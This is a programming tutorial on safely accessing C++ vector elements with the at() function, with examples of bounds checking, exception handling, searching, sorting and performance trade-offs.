circuit topology and operation principles of the proposed mixer are presented. An insight into RFCR mixer operation is given by analyzing the innovative techniques that are adapted to overcome the limitations in confirming the stringent requirements for CR application. Section 4 reports the RC-extracted postlayout simulation results and Section 5 presents the conclusion.\n\n#### 2. Design Challenges\n\nSeveral publications were reported on RFCR architecture [7, 20, 23] which can be amenable to both narrow and wideband applications. The RFCR architecture is more viable design for wideband system due to its inherent wideband input matching, low-power consumption, and high gain characteristics. In typical wide bandwidth application, a flat frequency response of gain and NF is preferred across the operating frequency. However, the conventional RFCR architecture tends to suffer from poor NF performance although the CG can be flattened across the range of wide bandwidth due to intrinsic conflict between flat gain and flat NF [21, 24, 25]. Therefore, the conventional RFCR architecture is reviewed in order to analyse the performance parameter trade-offs, which limit the extension of the operational bandwidth. The architecture of Figure 1(a) illustrates the common single-balanced RFCR mixer with the simplified equivalent small signal representation of the transconductance stage given in Figure 1(b). Transistor represents the RF input transistor; transistor is LO switching pair; capacitor is the DC-decoupling capacitor; capacitor is the emulation of the parasitic capacitance at node while resistors , , and represent the input source resistance, feedback resistor, and load resistor, respectively.\n\nAt low frequency, the frequency-dependent component is negligible. From Figure 1(b), the input impedance, can be defined as follows: where is the open-loop gain, computed as , in which is the RF input transconductance represented as and is . Equation (1) reveals that input impedance of the RFCR circuit is mainly determined by resistor and transconductance . 
In order to achieve an input reflection coefficient,  dB, with respect to a source impedance of  Ω, yields values in the range of 25 Ω to 100 Ω [7, 21].\n\nThe voltage gain and noise factor of the transconductance stage can be derived as where is the ratio between the device transconductance and the zero-bias drain conductance, while is the channel thermal noise coefficient. From (1) and (3), it can be observed that there is a close relationship between input impedance matching and NF. The NF can be significantly improved by increasing the RF input transconductance and the value of resistor at the expense of the input impedance matching performance.\n\nHowever, in a practical circuit implementation, the parasitic capacitances introduced by the gates of the input transistors further degrade the input matching, especially at high frequencies. The frequency-dependent component is taken into account to determine the limitation on the wideband operating bandwidth; thus (1) can be rewritten as follows: where . From (4), as  Ω for the perfect matching condition, the maximum gate-source parasitic capacitance can be expressed as follows: where represents the input port impedance and is the cut-off frequency. Based on (5), at the targeted input matching of −10 dB with an upper corner frequency of 10 GHz with respect to a source impedance of  Ω, the maximum capacitance contributed from both NMOS and PMOS input transistors equals 200 fF. Evidently, a comparatively small parasitic capacitance corresponds to a small aspect ratio of the RF input transistors, which in turn limits boosting of the RF input transconductance and the achievement of low noise performance.\n\nIn addition to this trade-off, investigation of the noise contribution from the switching stage reveals further setbacks which degrade the mixer’s performance. The total output noise of a mixer consists of thermal noise and flicker noise. The thermal noise, which is mainly dominated by the transconductance stage, can be easily reduced by increasing the bias current. The switches in an active mixer predominantly contribute to the growth of flicker noise at the mixer’s output. The flicker noise generated by the LO switches appears at the output of the mixer via direct and indirect mechanisms . The flicker noise through the direct mechanism is due to random modulation of the duty cycle of the output current, whereas through the indirect mechanism it is caused by charging and discharging of the parasitic capacitances between the transconductance and LO stages. The output noise currents generated by the direct and indirect mechanisms are given in the following [26, 27]: where is the DC tail current in the switching stage, is the equivalent flicker noise of the switching pair, is the slope of the LO signal, is the LO period, is the parasitic capacitance at the switching tail, is the frequency of the LO signal, and is the transconductance of the switching transistor. In reference to (6) and (7), the direct and indirect noise currents are evidently proportional to the flicker noise voltage, of the LO transistor, which is expressed in the following: where is the technology parameter, and are the effective width and length of the LO transistor, respectively, is the oxide capacitance of the LO transistor, and is the operating frequency. Apparently, in order to minimize the flicker noise effect caused by the direct mechanism, a low DC current at the switching stage and a large LO transistor size are preferred. 
On the contrary, the larger size of LO switching transistor yields to a larger parasitic capacitance, at node as referred to in Figure 1(a). This results in an increase of noise current from indirect mechanism as can be observed from (7). In addition, the capacitance also creates detrimental effect at high frequency by introducing a low impedance path for RF signal which shunts the RF signal to the ground, thus reducing the CG and adversely limiting the operational bandwidth. This effect can be mathematically proven by deriving the pole frequency of the effective transconductance of the mixer in Figure 1(a) as in the following: where is total resistance at the node . Hence, the pole frequency of the mixer which plays a crucial role in determining the operating bandwidth of the mixer core can be derived as It is noted that the capacitor forms as a low-pass filter at the tail of switching quad, where the gain response rolls off beyond the cut-off frequency. Therefore, it can be concluded that obtaining a large operation bandwidth with relatively large capacitor at node is not feasible. This has driven the need for the exploration of new design technique to achieve large bandwidth performance.\n\n#### 3. Proposed Mixer\n\nThe proposed RFCR mixer illustrated in Figure 2 consists of RF input transistors , current-reuse PMOS bias transistors , feedback resistor , DC-decoupling capacitor , switching transistors , peaking inductor , and passive load of and . The folded architecture is preferred over the conventional series stacking topology due to its merit in low voltage headroom realization. The minimum voltage headroom that can be applied to the designed circuit is approximated as where and are the overdrive voltage of transistors and , respectively, while and are the respective threshold voltage of the transistors and .\n\nThe transconductance stage is realized through the integration of inverter with feedback resistor, . At the transconductance stage, PMOS transistor is stacked at the top of NMOS transistor to form a current-reuse topology. Therefore, the transistor enhances the RF input transconductance to without additional power consumption compared to a single N-type common source amplifier associated with an RF input transconductance, . In addition, the PMOS transistor also provides high intrinsic output impedance to prevent RF signal leakage to the power supply. The resistor is used not only to meet the aspired input impedance matching criterion, but also to reduce the power consumption in line to the elimination of additional biasing circuitry for transistors in the context of self-biased principle. By adapting the complementary current-reuse technique, the DC current from the switching stage is fed into transistor instead of being routed into silicon ground as in a typical folded topology apparently in a quest to boost the gain without additional power consumption. As a result, the NMOS transistor contributes more transconductance than PMOS transistor due to an increased current flow through the transistor ; thus the aspect ratio of transistors and along with feedback resistor is optimized diligently according to (1) and (3).\n\nAs mentioned before, a large aspect ratio of RF input transistors contributes to a respective large gate-source parasitic capacitance at the input stage of the conventional RFCR topology and thus adversely affects the input matching and concurrently reduces the operating bandwidth. 
Hence, an inductor is placed in series with the gate of the transconductance stage transistors while the input capacitor is placed in parallel to the transconductance stage to extend the input bandwidth of the frequency response in achieving a good matching over the operating frequency range. The capacitor and inductor integrated with the total gate-source capacitance, of input transistors, form a third-order LC ladder low-pass filter. In this approach, the inductor coupled with the capacitor to eliminate the effect of and to resonate out the reactive component of at the desired frequency. Through this technique, the constraints of gate-source parasitic capacitance as described in (5) are relaxed. In preference the transconductance can be increased to achieve higher gain and low noise performance simultaneously by increasing the size of RF input transistor while retaining the operating bandwidth as there is an additional degree of freedom in increasing .\n\nFigure 3 depicts the corresponding half circuit small signal representation of the proposed wideband mixer which is illustrated in Figure 2. The capacitors and represent the parasitic capacitances at nodes and , respectively. To simplify the analysis, the DC blocking capacitor between the transconductance and switching stage is neglected since the impedance in effect of is relatively small at the operating frequency range. The input impedance and the input return loss of the proposed architecture can be derived and expressed as in (12) and (13), respectively, where is total gate-source capacitance of the input transistors and denotes the impedance looking into the resistor . Assume that the π-match LC network is symmetrical for perfect input impedance matching by equating the capacitor to capacitor and which is typically 50 Ω. From (12), a good input matching for this circuit is obtained at frequencies As can be seen from (14), the two frequencies, and , are adjusted to be located at DC and high frequency, respectively. The frequency is optimized to be in the vicinity of frequency in order to maintain an input reflection of below −10 dB across the entire operating frequency confirming a good input matching response inherited. At node of Figure 2, the resistive load, , is designed to be relatively large compared to the impedance looking into the switching transistors; thus the RF signal is driven to subsequent stage through the AC coupling capacitor, . In the worst case scenario, a small amount of RF signal leakage through the load resistor can still be shorted out to ground through the load capacitor instead of being routed to the IF output. Since the impedance looking into transistor at node is also large, the RF signal is forced to enter the switching quad.\n\nA PMOS based local oscillator (LO) switching stage is adopted in place of conventional NMOS transistor as PMOS transistor inherits an intrinsic characteristic of low flicker noise performance and less LO power sensitivity compared to NMOS transistor . In reference to (6), large switching transistors with low LO current are applied to minimize the flicker noise in the direct mechanism. In contrast, a large switching transistor indirectly translates flicker noise to the mixer output due to the presence of large tail capacitance at the switches as described in the previous section. 
The inherited parasitic capacitance also limits the bandwidth, hence promoting the exploration of inductive peaking technique as illustrated in Figure 2.\n\nThe inductor is placed at the tail of the switches to enhance the bandwidth through a peaking at high frequency without consuming additional power and voltage headroom. The aspect ratio of transistors and switching transistors are selected appropriately to form two suitable parasitic capacitors and at nodes and , respectively. These capacitors form a virtual -network along with inductor , relaxing the requirement of integrating additional capacitors which degrade the CG and NF. From the perspective of transient analysis, the current charges the two capacitors separately through the inductor , at different point of time, resulting in the charging time to be reduced leading to an enhancement in bandwidth. In further analyzing the operation of the peaking inductor , in reference to the frequency response, the LO transistor is modelled as an ON-OFF switch while the resistor represents the resistance at the source terminal of switching transistor as illustrated in Figure 3. Based on this approximated model, the overall conversion gain of the mixer is computed by the following expression: where is the RF input frequency and is the IF output frequency.\n\nThe transfer function of and can be solved by small signal analysis which are given by (16) and (17), respectively, while the transfer function of can be derived adapting Fourier series analysis by approximating the LO signal as an ideal square wave, which is given by (18) Since the impedances looking through the transistors at node and transistor at node are relatively large, hence the intrinsic resistances and in Figure 3 are neglected. With the integration of the peaking inductor, the frequency response of the RF signal in (9) is computed as in (19). The transfer function in (19) can be rewritten in expressing a single real pole and two complex poles as follows: Comparing (19) and (20), the pole factor , the real pole frequency , and the complex pole frequencies can be expressed as follows: Notably, the bandwidth extension is heavily dependent on the value of parasitic capacitances and , inductor , and resistors and . The real pole results in gain and bandwidth reduction at the frequency higher than its value, whereas the complex poles can be adjusted to provide a peaking in frequency response which compensates this adverse effect. Since the real pole is the dominant parameter in achieving a high bandwidth and gain, it should be peaked at the highest frequency as possible, while the location of complex poles are adjusted accordingly to compensate for the gain drop at high frequencies by introducing a peaking and further extending the bandwidth. However, bandwidth enhancement using this approach introduces in-band ripples. Increasing the potentially enhances the gain at the peaking; however increasing excessively would result in bandwidth reduction. Similarly increasing shifts the peaking to higher frequencies; however when is increased excessively, it results in the reduction of gain in reference to (21) and (22). Therefore, and are optimized appropriately to obtain relatively flat and high gain response over the wide bandwidth of operation.\n\nThe mixing point of RF and LO signals is located at the node . 
The switching quad is biased in the vicinity of the threshold voltage at low bias current, thus reducing the DC offset and flicker noise while resulting in a substantial increase in switching efficiency. The low bias current allows the integration of larger load resistance, thus increasing the CG of the mixer and relaxing the constraint of voltage headroom consumption. Load capacitor couples with the load resistor presenting a low-pass filter at the IF output with the output real pole equal to based on (17). This integration suppresses the feed components of , , and other unwanted harmonics including the higher-order mixing spurs such as , where and are integers. Ultimately, the overall conversion gain of the presented wideband mixer at the desired output spectrum is given by\n\n#### 4. RC-Extracted Simulation Results\n\nThe proposed wideband mixer of Figure 2 has been designed and simulated using 0.13 μm CMOS standard process for regulated CR applications. The layout parasitic extraction (LPE) is executed and validated under Cadence Spectre-RF and Mentor Calibre platform. In an interest of perfect matching and the minimization of mismatch parasitic coupling effect, the components and metal paths in the designed mixer circuit were placed as symmetrical as possible. The physical layout of the circuit including the RF ESD pads is illustrated in Figure 4 with a total chip area consumption of 1.08 × 1.00 mm2.\n\nThe postlayout simulation results were carried out with a total power consumption of 3.5 mW at respective voltage headroom of 1 V. The RF input of the wideband mixer is matched to 50 Ω termination and the respective simulated input return loss, , is illustrated in Figure 5. The of the optimized RFCR wideband mixer is achieved well below −12 dB across the operating frequency ranging from 50 MHz to 10 GHz.\n\nFigure 6 shows the simulated NF versus RF frequency from 50 MHz to 10 GHz with a fixed IF output at 10 MHz while the LO power is set to be 0 dBm. The simulated minimum and maximum NF of the wideband mixer are 10.8 dB and 12.8 dB, respectively. This wideband mixer exhibits a flat NF with a variation of ±1 dB across the entire frequency range. Figure 7 shows the simulated CG versus RF frequency in a comparison plot with the presence of the peaking inductor and absence of the peaking inductor. At low frequency, the CG is observed to be around 16 dB. However, at high frequency range, the CG is achieved to about 8 dB without the peaking inductor in place and about 14 dB with the integration of peaking inductor, resulting in 6 dB of gain improvement. This plot reveals and confirms that the peaking inductor in RFCR mixer had improved the CG at high frequency range. The proposed wideband mixer achieves a high gain with a flatness variation of ±1.4 dB where the maximum CG of 16.3 dB is observed at 500 MHz and a minimum of CG of 13.5 dB is observed at 5.5 GHz.\n\nIn observing the linearity response, the center frequency of 5 GHz from the operating bandwidth is selected. With an LO power of 0 dBm at  MHz, the P1dB is simulated to be −15.8 dBm. Applying two-tone test with 1 MHz frequency offset, the simulated IIP3 is −6.3 dBm as shown in Figure 8. Figure 9 depicts the overall performance of the simulated P1dB and IIP3 against RF frequency of the mixer over the range of 50 MHz to 10 GHz. 
The mixer achieves a P1dB range of −17.0 dBm to −13.6 dBm while the IIP3 ranges from −8.1 dBm to −4.5 dBm.\n\nThe overall performance of the proposed mixer can be weighed against other reported works using a figure of merit (FOM). Generally, mixer performance is compared in terms of CG, NF, linearity (IIP3 or input P1dB), and power consumption [29, 30]. However, a trade-off exists between power dissipation and bandwidth in wideband mixer design. Hence, it is essential to include the operating bandwidth parameter in the FOM calculation for a fair comparison with the reported works . As a result, a modified FOM is introduced for wideband mixers, which is given as where and represent the lower cut-off frequency and upper cut-off frequency, respectively. is the power consumption in watts. is the maximum conversion gain, is the maximum input third-order intercept point, and is the minimum noise figure. The simulated results of the proposed architecture along with other reported results of recent works are tabulated in Table 1. The proposed mixer achieves an FOM of 26.14 dB, the highest among the compared mixers.\n\n#### 5. Conclusion\n\nIn this work, a new wideband mixer for a CR receiver has been successfully designed and simulated in a 0.13 μm CMOS process. A π-match LC network is embedded at the input of the RFCR architecture to simultaneously enhance the input impedance matching and NF while encapsulating an operating bandwidth as large as 10 GHz. The RFCR adaptation enables the proposed mixer to achieve high gain by summing the transconductances of the NMOS and PMOS devices in the transconductance stage. The peaking inductor achieves a flat CG response by compensating for the gain degradation at high frequencies, while extending the bandwidth. Additionally, the complementary current-reuse technique is implemented at the output stage to further boost the CG without dissipating additional power. The proposed wideband mixer operates from 50 MHz to 10 GHz with an RF input return loss better than −12 dB, a high CG of  dB, a flat NF of  dB, a P1dB of − dBm, and an IIP3 of − dBm. This mixer operates at a low voltage headroom of 1.0 V while consuming only 3.5 mW of power. These characteristics make the proposed wideband mixer a suitable architecture to meet the growing demands of CR applications.\n\n#### Conflict of Interests\n\nThe authors declare that there is no conflict of interests regarding the publication of this paper.\n\n#### Acknowledgment\n\nThis research is supported by the UM High Impact Research Grant UM.C/HIR/MOHE/ENG/51 from the Ministry of Higher Education, Malaysia." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8981266,"math_prob":0.9150288,"size":36086,"snap":"2023-40-2023-50","text_gpt3_token_len":8111,"char_repetition_ratio":0.14289674,"word_repetition_ratio":0.046058457,"special_character_ratio":0.21964197,"punctuation_ratio":0.14210986,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.960772,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-28T17:02:05Z\",\"WARC-Record-ID\":\"<urn:uuid:9ed795cf-29b2-4ff2-a017-1a2d5559d153>\",\"Content-Length\":\"990305\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e49e1ed2-fb15-4ee8-9a54-b41335d837e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:060530d1-84b3-48bd-a459-0189f1a65b7e>\",\"WARC-IP-Address\":\"104.18.40.243\",\"WARC-Target-URI\":\"https://www.hindawi.com/journals/tswj/2014/683971/\",\"WARC-Payload-Digest\":\"sha1:ZV6XCQEEZTA33CWJ3GYVFWOBEG4NF6UX\",\"WARC-Block-Digest\":\"sha1:6KNBSHZ6A7AUTK2NX4JRYUEIRY3YBSS6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510427.16_warc_CC-MAIN-20230928162907-20230928192907-00740.warc.gz\"}"}
https://lists.boost.org/Archives/boost/2009/05/151970.php
[ "", null, "# Boost :\n\nSubject: [boost] minmax_element and sorted data\nDate: 2009-05-29 10:12:50\n\nI've noticed that minmax_element makes roughly 3n/2 comparisons, though n -\n1 comparisons are all that is required to see if data is sorted, and if it\nis, the minimum and maximum are known. Sorted data is a relatively common\nspecial-case, and I think minmax_element might be better optimized to take\nadvantage of sorted data when it is provided. Also, it would be nice to\nhave a version of it that returns the minimum, maximum, and whether the data\nis sorted.\nAlso worth considering is whether minmax_element can work more efficiently\nwith long chains of sorted (or reverse-sorted) data, by taking advantage of\nthe fact that the maximum and minimum of sorted data is known, and it takes\nn - 1 comparisons to tell whether a list of n items is sorted.\n\nAn example of how sorting can be tested without hurting overall runtime for\nunsorted data is how I find the minimum and maximum for integer_sort. Note\nthat when the data is sorted, it returns with max and min being identical; a\nboolean could provide that information in a more general method.\nSource:\n\n//Find the minimum and maximum using <\ntemplate <class RandomAccessIter>\ninline void\nfind_extremes(RandomAccessIter current, RandomAccessIter last,\nRandomAccessIter & max, RandomAccessIter & min)\n{\nmin = max = current;\n//It is assumed we have more than 1 element; there are multiple\nchecks for this\nwhile(!(*(current + 1) < *current)) {\n//If everything is in sorted order, return\nif(++current == last - 1)\nreturn;\n}\n//The maximum is the last sorted element\nmax = current;\n//Now that we know it isn't sorted, doing an efficient max/min find\nstd::pair<RandomAccessIter, RandomAccessIter> vals =\nminmax_element(++current, last);\nif(*(vals.first) < *min)\nmin = vals.first;\nif(*max < *(vals.second))\nmax = vals.second;\n}" ]
[ null, "https://lists.boost.org/boost/images/boost.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8110765,"math_prob":0.921457,"size":2005,"snap":"2021-31-2021-39","text_gpt3_token_len":498,"char_repetition_ratio":0.13843079,"word_repetition_ratio":0.0,"special_character_ratio":0.24339151,"punctuation_ratio":0.14285715,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9525017,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-21T04:42:43Z\",\"WARC-Record-ID\":\"<urn:uuid:1a665cc2-e301-4a5e-acb8-8c63c88d58e4>\",\"Content-Length\":\"12111\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c64db7b6-529c-4bee-95f3-1f47e984883d>\",\"WARC-Concurrent-To\":\"<urn:uuid:f4a738ef-7a22-462b-99cc-af928c96eb91>\",\"WARC-IP-Address\":\"146.20.110.251\",\"WARC-Target-URI\":\"https://lists.boost.org/Archives/boost/2009/05/151970.php\",\"WARC-Payload-Digest\":\"sha1:43JBDLFT77G57NJNF3MDLYAYWPZ22Y57\",\"WARC-Block-Digest\":\"sha1:M6SVTZRMAVAZ4MG2YFYCXI7UWZPVKK4M\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057158.19_warc_CC-MAIN-20210921041059-20210921071059-00652.warc.gz\"}"}
https://www.electrotechnik.net/2017/05/classification-of-fluids_19.html
[ "# Classification of fluids\n\nFluids are classified into\n\n• Ideal or perfect fluids\n• Real fluids or Practical fluids\n• Newtonian fluids and\n• Non-Newtonian fluids\n\nIdeal fluids\nAn ideal fluid is one which has density as the only property.  The ideal fluid has not viscosity, surface tension, cohesion or adhesion.\n\nReal fluids\nThese are also known as practical fluids. Fluids which have viscosity, surface tension, adhesion and cohesion are called real fluids\nEg. water, oil, air\n\nNewtonian Liquids\nNewtonian liquids are those which obey Newton's law of viscosity\n\nNon-newtonian liquids\nLiquids which do not obey Newton's law of viscosity are called Non-Newtonian liquids." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94843,"math_prob":0.6494663,"size":610,"snap":"2020-45-2020-50","text_gpt3_token_len":139,"char_repetition_ratio":0.21122113,"word_repetition_ratio":0.02173913,"special_character_ratio":0.18852459,"punctuation_ratio":0.10377359,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9709905,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-25T04:40:06Z\",\"WARC-Record-ID\":\"<urn:uuid:f9fd3be0-3a8e-4230-a4d6-d9ef2e5c04cd>\",\"Content-Length\":\"49393\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aad5b404-5221-41e0-99e2-6eed60a2bda6>\",\"WARC-Concurrent-To\":\"<urn:uuid:58279755-f599-4a23-8ea7-15dcd630eba9>\",\"WARC-IP-Address\":\"104.27.190.109\",\"WARC-Target-URI\":\"https://www.electrotechnik.net/2017/05/classification-of-fluids_19.html\",\"WARC-Payload-Digest\":\"sha1:3JXYS5LTF3MLRHY6XFT25EGHS6U3SUZR\",\"WARC-Block-Digest\":\"sha1:3HRN4YCHIILFCQ3NDYHXP3ZSUGY5X4VS\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107887810.47_warc_CC-MAIN-20201025041701-20201025071701-00276.warc.gz\"}"}
https://thelinuxcode.com/at-functions-cpp-vector/
[ "# Mastering the C++ Vector at() Function for Safe Access\n\nThe C++ vector is one of the most ubiquitous containers used in modern C++ programming, providing a dynamic array of elements. Flexibly accessing those elements safely is critical for building robust programs that can handle errors.\n\nThat‘s where the powerful at() function comes in for C++ vectors. It enables bounds-checked access to elements along with the ability to leverage exceptions for error handling.\n\nIn this comprehensive guide, we‘ll unpack everything you need to know to master the at() function for C++ vector access and become an expert at harnessing its capabilities in your own code.\n\n## A Deep Dive into Vectors\n\nBefore jumping into the specifics of at(), it‘s useful to step back and understand vectors at a fundamental level.\n\nVectors provide a sequence container that hold a variable number of objects dynamically in memory. This provides a more flexible data structure than fixed C-style arrays where the size cannot change.\n\nSome key capabilities provided by vectors include:\n\n• Dynamic resizing – Add or remove elements at any time\n• Contiguous storage – Elements stored contiguously for cache performance\n• Automated memory management – No manual allocations/deallocation\n• Intuitive syntax – vec.push_back(), vec[i], etc.\n\nThis combination makes vectors incredibly useful in C++ programs. They can be used for anything from storing application data to holding vertices in a game engine.\n\nSome examples of common vector use cases:\n\n• Storing a high score list for a game\n• Queue of network packets waiting to be sent\n• Objects representing rows in a spreadsheet\n• Vertices of a polygon mesh or 3D model\n\nVectors originated in the C++ STL in 1994 based on earlier containers in C. The versatility of vectors has made them a ubiquitous tool for any C++ programmer.\n\nNow let‘s dive into safely accessing elements in a vector using at().\n\n## Proper Syntax and Usage of at()\n\nThe member function syntax for at() is straightforward:\n\n``vector.at(index)``\n\nWhere `vector` is the vector instance, and `index` is the position of the element you want to access.\n\nFor example:\n\n``````std::vector<std::string> fruits {\"apple\", \"banana\", \"orange\"};\n\nstd::string first = fruits.at(0); //gets \"apple\"``````\n\nThis reads the element at index 0 in the fruits vector, returning back the string \"apple\".\n\nWe can also use at() to modify elements already in a vector:\n\n``fruits.at(2) = \"grape\"; //modifies orange -> grape``\n\nAnd loop through all elements printing them:\n\n``````for (int i = 0; i < fruits.size(); i++) {\nstd::cout << fruits.at(i) << \"\\n\";\n} ``````\n\nOne key difference between at() vs [] access is bounds checking. Consider this example:\n\n``````std::vector<int> vec {1, 2}; //size 2\nint a = vec.at(2); //throws out_of_range!``````\n\nAttempting to access index 2 would throw an exception here, since it is past the end of the valid range. 
With [], this would compile but lead to undefined behavior when run.\n\nSo at() enables safe access with checks, while [] provides no checks but is faster.\n\n## Accessing Vector Elements\n\nNow let's explore some more examples of accessing elements using at():\n\n### Reading User Input into a Vector\n\nWe can build up a vector by reading user input, then access it safely using at(). Note that at() itself can never grow a vector -- calling userNums.at(i) for an element that does not exist yet throws -- so new values are appended with push_back():\n\n``````std::vector<int> userNums;\nint input;\n\nfor (int i = 0; i < 5; i++) {\n\nstd::cout << \"Enter number: \";\nstd::cin >> input;\n\nuserNums.push_back(input); //append to vector\n}``````\n\nThis allows the user to dynamically grow the vector by pushing integers into it. No pre-allocation required!\n\n### Totaling Values in a Vector\n\nTo total all elements in a vector, we can leverage at() for safe indexed access:\n\n``````std::vector<double> purchases {23.5, 10.0, 33.25, 17.0};\n\ndouble total = 0.0;\n\nfor (size_t i = 0; i < purchases.size(); i++) {\ntotal += purchases.at(i);\n}\n\nstd::cout << \"Total: \" << total; //83.75``````\n\nBy using at() inside the loop, we safely access each element value to sum up.\n\n### Checking for Duplicates\n\nHere is an example of checking if any duplicate values exist in a vector using at():\n\n``````std::vector<std::string> names {\"Sarah\", \"Rashid\", \"Rashid\"};\n\nbool duplicate = false;\n\nfor (size_t i = 0; i < names.size(); i++) {\nfor (size_t j = i + 1; j < names.size(); j++) {\nif (names.at(i) == names.at(j)) {\nduplicate = true;\n}\n}\n}\n\nif (duplicate) {\nstd::cout << \"Duplicate found!\\n\";\n} else {\nstd::cout << \"No duplicates.\\n\";\n}``````\n\nBy nesting two loops, we can compare each element against the remaining elements using at() to see if any match.\n\n### Modifying Vector Elements\n\nTo modify an existing element in a vector, we can simply assign to it with at():\n\n``````std::vector<std::string> names {\"Bob\", \"Alice\", \"Joe\"};\n\nnames.at(1) = \"Mary\"; //modifies \"Alice\" to \"Mary\" ``````\n\nThis safely changes the element at index 1 by doing bounds checking before assignment.\n\nNote that at() cannot insert or append elements -- it only reads or overwrites existing ones. Appending and inserting use push_back() and insert() instead:\n\n``````std::vector<int> vec {1, 2, 3};\n\nvec.push_back(4); //append 4 to end\n\nvec.insert(vec.begin() + 1, 10); //insert 10 at index 1``````\n\nInserting requires shifting all following elements over, which insert() handles correctly; calling vec.at(3) on a size-3 vector would simply throw.\n\n### Sorting Elements in a Vector\n\nTo sort a vector in ascending order, we can use a swap pattern leveraging at():\n\n``````std::vector<int> nums {4, 2, 5, 1, 3};\n\n//naive bubble sort\nfor (size_t i = 0; i < nums.size(); i++) {\nfor (size_t j = 0; j + 1 < nums.size(); j++) {\nif (nums.at(j) > nums.at(j+1)) {\n//swap elements\nint temp = nums.at(j);\nnums.at(j) = nums.at(j+1);\nnums.at(j+1) = temp;\n}\n}\n}\n\n//vector now sorted: {1, 2, 3, 4, 5}``````\n\nBy swapping adjacent elements using at(), we gradually move larger values rightwards until sorted.\n\n## Comparisons and Logic with at()\n\nThe at() function is also invaluable for comparisons and conditional logic dealing with vectors:\n\n### Searching a Vector\n\nWe can search for an element in a vector using at() like so:\n\n``````std::vector<int> vec {15, 20, 7, 8};\nint searchNum = 8;\n\nfor (size_t i = 0; i < vec.size(); i++) {\nif (vec.at(i) == searchNum) {\nstd::cout << searchNum << \" found!\\n\";\nbreak;\n}\n}``````\n\nThis loops through comparing each element to the search number until found.\n\nWe could expand this to a binary search for improved O(log N) performance on a sorted vector.\n\n### Conditional Logic on Elements\n\nMore complex conditional 
logic is also possible:\n\n``````std::vector<Person> people {/*...*/};\n\n//find teenagers\nfor (size_t i = 0; i < people.size(); i++) {\nPerson p = people.at(i);\nif (p.age >= 13 && p.age <= 19) {\nstd::cout << p.name << \" is a teenager\\n\";\n}\n}``````\n\nHere we check each Person's age using at() and some multi-condition logic to filter teenagers.\n\n### Validating Input\n\nWe can also validate user input before it is appended to a vector (again with push_back(), since at() cannot create new elements):\n\n``````std::vector<int> userInput;\n\n//prompt for numbers\nfor (int i = 0; i < 5; i++) {\n\nint input;\nstd::cin >> input;\n\n//validate input is > 0\nif (input <= 0) {\nstd::cout << \"Invalid number, skipping.\\n\";\n} else {\nuserInput.push_back(input);\n}\n\n}``````\n\nThis validates each input before appending it to the vector; later reads can then use at() safely.\n\n## Passing Elements to Functions\n\nWhen passing elements to functions, at() provides bounds checking:\n\n``````//function that prints passed object\ntemplate <typename T>\nvoid printElement(const T& obj) {\nstd::cout << obj << \"\\n\";\n}\n\nstd::vector<std::string> names {\"Sarah\", \"Ahmed\", \"Lucy\"};\n\nprintElement(names.at(0)); //print first element``````\n\nSince printElement takes a reference, no copying occurs. But at() still ensures we only pass valid in-bounds elements.\n\nFor passing an entire vector, we typically pass by reference:\n\n``````void printVector(const std::vector<int>& vec) {/*...*/}\n\nstd::vector<int> myVec {1, 2, 3};\nprintVector(myVec); //pass by reference ``````\n\nThis avoids copying the entire vector while allowing the function to access it.\n\n## Handling Errors and Exceptions\n\nA key advantage of at() is that its bounds checking enables exceptions to handle errors:\n\n``````std::vector<std::string> names {\"Sarah\", \"Lucy\"};\n\ntry {\n\nstd::string first = names.at(100); //out of bounds!\n\n} catch (const std::out_of_range& e) {\n\n//handle error\nstd::cout << \"Index out of range!\\n\";\n\n}``````\n\nWhen at() is given an invalid index, it throws a std::out_of_range exception that can be caught. We can then print an error, log it, or recover as needed.\n\nThis is far better than vector[] access, which has undefined behavior on invalid indices.\n\nSome best practices for exceptions with at():\n\n• Catch by const reference to avoid copying\n• Print error context in the catch block\n• Only handle expected errors – let unknown ones bubble up\n• Use error codes and enums rather than strings\n• Document exceptions thrown in functions\n\nProper use of try/catch blocks prevents crashes when using at() with vectors.\n\n## Performance Considerations\n\nThe at() function provides safety via bounds checking – but this comes at a performance cost.\n\nEach call to at() must check if the passed index is valid. This adds overhead compared to [] access which is unchecked.\n\nSome benchmarks on modern hardware show at() being ~2-3x slower than [] for vector access.\n\nSo in performance-critical sections of code, [] may be preferred if you can guarantee index validity yourself. Other optimizations include:\n\n• Reserving vector capacity ahead of time to prevent reallocation\n• Using iterators rather than index access\n• Improving algorithm complexity to do fewer checks\n• Using multithreading to parallelize independent checks\n\nBut for most code, favor using at() for its safety and resilience against bugs. 
